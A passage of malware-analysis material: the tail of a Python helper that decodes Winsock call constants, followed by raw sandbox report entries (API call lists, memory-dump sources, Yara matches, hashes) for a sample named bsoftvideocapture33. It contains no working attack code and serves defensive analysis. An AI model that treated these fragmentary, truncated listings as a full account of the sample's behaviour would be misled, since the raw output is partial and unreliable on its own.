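    args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
    sub = m["sub"].upper() if m["sub"] else None
    return ApiCall(m["api"], m["module"], args, m["ref"].upper(), sub)


def parse_lines(lines: List[str]) -> List[ApiCall]:
    return [c for c in map(parse_line, lines) if c is not None]


def describe(call: ApiCall) -> Optional[str]:
    """Name the constants in the two calls that shape the socket; None for anything else."""
    if call.api == "setsockopt" and len(call.args) >= 5:
        level, opt, optlen = call.args[1], call.args[2], call.args[4]
        lvl = "?" if level is None else LEVELS.get(level, hex(level))
        name = "?" if opt is None else OPTNAMES.get(lvl, {}).get(opt, hex(opt))
        return f"setsockopt(level={lvl}, optname={name}, optlen={optlen})"
    if call.api in ("WSASocketA", "WSASocketW") and len(call.args) >= 6 and call.args[5] is not None:
        flags = call.args[5]
        names = [n for bit, n in WSA_FLAGS.items() if flags & bit] or ["0"]
        return f"{call.api}(dwFlags={'|'.join(names)})"
    return None


def winsock_summary(lines: List[str]) -> List[Tuple[str, str]]:
    """(call-site address, decoded call) for every socket-shaping call in the listing."""
    out: List[Tuple[str, str]] = []
    for call in parse_lines(lines):
        text = describe(call)
        if text:
            out.append((call.ref, text))
    return out


if __name__ == "__main__":
    for ref, text in winsock_summary(SAMPLE_LINES):
        print(ref, text)
```

Running it on the copied lines yields `02C02EFD WSASocketA(dwFlags=WSA_FLAG_OVERLAPPED)` and `02C02F36 setsockopt(level=IPPROTO_IPV6, optname=IPV6_V6ONLY, optlen=4)`; the `Part of subcall` line is kept with its callee address so that nested calls can be attributed to the right function when the whole report is fed through.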
APIs
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction ID: a34dc2c01341a1d51790be46c2c99bbffb75e72e1ac9c1b80d78d2c4981b7a5c
• Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction Fuzzy Hash: CA01283240114AFBCF126E95CC028AE3F22BF5A254B588415FA2899131C336C6B6FB81
APIs
• ___BuildCatchObject.LIBCMT ref: 02C195F4
  • Part of subcall function 02C19C0B: ___AdjustPointer.LIBCMT ref: 02C19C54
• _UnwindNestedFrames.LIBCMT ref: 02C1960B
• ___FrameUnwindToState.LIBCMT ref: 02C1961D
• CallCatchBlock.LIBCMT ref: 02C19641
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• String ID:
• API String ID: 2633735394-0
• Opcode ID: 713256ae837dbe65801958c0297b5b5fc49ecbb291bb0655e55bccd4794a1f23
• Instruction ID: a2f6f8be9f8461ab89388fbb3ecafbad9802fc79cbe2422894d72ecc1027d457
• Opcode Fuzzy Hash: 713256ae837dbe65801958c0297b5b5fc49ecbb291bb0655e55bccd4794a1f23
• Instruction Fuzzy Hash: 12012532000149FBCF12AF95CC52EDA3BBAEF8A754F058015FA1862120C332E561FFA4
APIs
• sqlite3_initialize.SQLITE3 ref: 6092A450
  • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
• sqlite3_mutex_enter.SQLITE3 ref: 6092A466
• sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
• sqlite3_memory_used.SQLITE3 ref: 6092A4BA
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
• String ID:
• API String ID: 2673540737-0
• Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
• Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
• Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
• Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
APIs
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
• String ID:
• API String ID: 3526213481-0
• Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
• Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
• Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
• Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
APIs
• sqlite3_prepare.SQLITE3 ref: 60969166
• sqlite3_errmsg.SQLITE3 ref: 60969172
  • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
• sqlite3_errcode.SQLITE3 ref: 6096918A
  • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
• sqlite3_step.SQLITE3 ref: 60969197
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
• String ID:
• API String ID: 2877408194-0
• Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
• Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
• Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
• Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
APIs
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C024A9
• RtlEnterCriticalSection.NTDLL(?), ref: 02C024B8
• InterlockedExchange.KERNEL32(?,00000001), ref: 02C024CD
• RtlLeaveCriticalSection.NTDLL(?), ref: 02C024D4
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
• String ID:
• API String ID: 4018804020-0
• Opcode ID: 1a9e037cc48d63fcf6f64441bae779a192bc17169be7f9a295ecf72f71cd9029
• Instruction ID: 4cde89cdf3117fc07b097cb5e28471dd90e24d2eaa07c6a4dab1f12eb1b843f7
• Opcode Fuzzy Hash: 1a9e037cc48d63fcf6f64441bae779a192bc17169be7f9a295ecf72f71cd9029
• Instruction Fuzzy Hash: CDF01972540204AFDB04AFA5EC88F9ABBACFF48751F404519FA04C6141DB71E5648FE0
APIs
• sqlite3_mutex_enter.SQLITE3 ref: 609084E9
• sqlite3_mutex_leave.SQLITE3 ref: 60908518
• sqlite3_mutex_enter.SQLITE3 ref: 60908528
• sqlite3_mutex_leave.SQLITE3 ref: 6090855B
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave
• String ID:
• API String ID: 1477753154-0
• Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
• Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
• Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
• Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
APIs
• __EH_prolog.LIBCMT ref: 02C02009
• RtlDeleteCriticalSection.NTDLL(?), ref: 02C02028
• CloseHandle.KERNEL32(00000000), ref: 02C02037
• CloseHandle.KERNEL32(00000000), ref: 02C0204E
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CriticalDeleteH_prologSection
• String ID:
• API String ID: 2456309408-0
• Opcode ID: ac925957b5bf25a90782f880e1ff147f0f3091eb794852fb380e09897aafd828
• Instruction ID: 16fe9829141fe66bd347efeccb5c0e3dc95a375179b9a29d22c99301b00d829a
• Opcode Fuzzy Hash: ac925957b5bf25a90782f880e1ff147f0f3091eb794852fb380e09897aafd828
• Instruction Fuzzy Hash: 330181714007649BC738AF54E848B9AB7B9FF04309F404A1DE84693590CF74AA58DFD5
APIs
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: Event$H_prologSleep
• String ID:
• API String ID: 1765829285-0
• Opcode ID: b80747bd0e79432af5b466f6484bc793131748795d595944ae3dfad532452386
• Instruction ID: 28510ff18218f339beb00c22d3d78bd580c81ab8f99a3ec6ce007f06810a1dcb
• Opcode Fuzzy Hash: b80747bd0e79432af5b466f6484bc793131748795d595944ae3dfad532452386
• Instruction Fuzzy Hash: DCF09031650110EFCB109F94D8C8B89BBA4FF0D321F0081A9F9099B280CB349814CBA1
APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                         • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                        • String ID: into$out of
                                                                                                                                        • API String ID: 632333372-1114767565
                                                                                                                                        • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                                                                        • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                                                                                        • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                                                                        • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog_memmove
                                                                                                                                        • String ID: &'
                                                                                                                                        • API String ID: 3529519853-655172784
                                                                                                                                        • Opcode ID: 0006ccddd26ea7168223dce5cf2b403306cb2127c278faa712716f0f4fbfedb7
                                                                                                                                        • Instruction ID: 45a774e1c1c2a920a211bb92656f94c830930f1ca84a108287e10cbe26b49e84
                                                                                                                                        • Opcode Fuzzy Hash: 0006ccddd26ea7168223dce5cf2b403306cb2127c278faa712716f0f4fbfedb7
                                                                                                                                        • Instruction Fuzzy Hash: D961AE71D00219DBDF20EFA4C981BEEFBB6AF48710F10816AD519BB291D7709A05DFA1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 609193A3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                         • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_freesqlite3_value_text
                                                                                                                                        • String ID: (NULL)$NULL
                                                                                                                                        • API String ID: 2175239460-873412390
                                                                                                                                        • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                                                                        • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                                                                                        • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                                                                        • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                         • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                        • String ID: -- $d
                                                                                                                                        • API String ID: 632333372-777087308
                                                                                                                                        • Opcode ID: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                                                                        • Instruction ID: d45f625f7ed72e8bd0cbe86fb5af212c953cff4c7e5ffbb26f6c4a79540968e1
                                                                                                                                        • Opcode Fuzzy Hash: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                                                                        • Instruction Fuzzy Hash: FB51F674A043689BDB26CF28C980789BBFABF55304F1481D9E89CAB341C7759E85CF40
                                                                                                                                        APIs
                                                                                                                                        • GetCPInfo.KERNEL32(?,00000000), ref: 00405BB3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Info
                                                                                                                                        • String ID: $
                                                                                                                                        • API String ID: 1807457897-3032137957
                                                                                                                                        • Opcode ID: 8be919fd1f317d968f1dd7194145b7f748f3cf7c70e6a819b272ea0fad10816c
                                                                                                                                        • Instruction ID: a56a174cbc4f2354ce51958eba1d0621761effbb059f2287080cdd9d93e72df2
                                                                                                                                        • Opcode Fuzzy Hash: 8be919fd1f317d968f1dd7194145b7f748f3cf7c70e6a819b272ea0fad10816c
                                                                                                                                        • Instruction Fuzzy Hash: 974168300187589AFB119764CD89BFB3FA8DB05700F1400FAD986FB1D3C23949589FAA
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                         • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                        • String ID: string or blob too big$|
                                                                                                                                        • API String ID: 632333372-330586046
                                                                                                                                        • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                                                                        • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                                                                                        • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                                                                        • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02C02D39: WSASetLastError.WS2_32(00000000), ref: 02C02D47
                                                                                                                                          • Part of subcall function 02C02D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02C02D5C
                                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 02C02E6D
                                                                                                                                        • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02C02E83
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$Sendselect
                                                                                                                                        • String ID: 3'
                                                                                                                                        • API String ID: 2958345159-280543908
                                                                                                                                        • Opcode ID: 4291146dac4d1dcbf5a7b4ed93c5507860d434c92d2bbc5ccb4216a76fb5a2de
                                                                                                                                        • Instruction ID: 00eb409e94d0436895fbe47b506366a82c8f41438f63623392e2a4485a759e77
                                                                                                                                        • Opcode Fuzzy Hash: 4291146dac4d1dcbf5a7b4ed93c5507860d434c92d2bbc5ccb4216a76fb5a2de
                                                                                                                                        • Instruction Fuzzy Hash: F031B270A003059FDF10EF60C8987EEBBAAAF44354F00455ADD04972C0EB719995DFA1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                         • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_logsqlite3_value_text
                                                                                                                                        • String ID: string or blob too big
                                                                                                                                        • API String ID: 2320820228-2803948771
                                                                                                                                        • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                                                                        • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                                                                                        • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                                                                        • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                                                                                        APIs
                                                                                                                                        • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02C073D8,?,?,00000000), ref: 02C086D5
                                                                                                                                        • getsockname.WS2_32(?,?,?), ref: 02C086EB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastgetsockname
                                                                                                                                        • String ID: &'
                                                                                                                                        • API String ID: 566540725-655172784
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C0BCB9
                                                                                                                                          • Part of subcall function 02C0C295: std::exception::exception.LIBCMT ref: 02C0C2C4
                                                                                                                                          • Part of subcall function 02C0CA4B: __EH_prolog.LIBCMT ref: 02C0CA50
                                                                                                                                          • Part of subcall function 02C127C5: _malloc.LIBCMT ref: 02C127DD
                                                                                                                                          • Part of subcall function 02C0C2F4: __EH_prolog.LIBCMT ref: 02C0C2F9
                                                                                                                                        Strings
                                                                                                                                        • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C0BCF6
                                                                                                                                        • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02C0BCEF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                                                        • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                                                                        • API String ID: 1953324306-1943798000
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C0BDAE
                                                                                                                                          • Part of subcall function 02C0C36C: std::exception::exception.LIBCMT ref: 02C0C399
                                                                                                                                          • Part of subcall function 02C0CB82: __EH_prolog.LIBCMT ref: 02C0CB87
                                                                                                                                          • Part of subcall function 02C127C5: _malloc.LIBCMT ref: 02C127DD
                                                                                                                                          • Part of subcall function 02C0C3C9: __EH_prolog.LIBCMT ref: 02C0C3CE
                                                                                                                                        Strings
                                                                                                                                        • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C0BDEB
                                                                                                                                        • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02C0BDE4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                                                        • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                                                                        • API String ID: 1953324306-412195191
                                                                                                                                        APIs
                                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 02C02AEA
                                                                                                                                        • connect.WS2_32(?,?,?), ref: 02C02AF5
                                                                                                                                        Strings
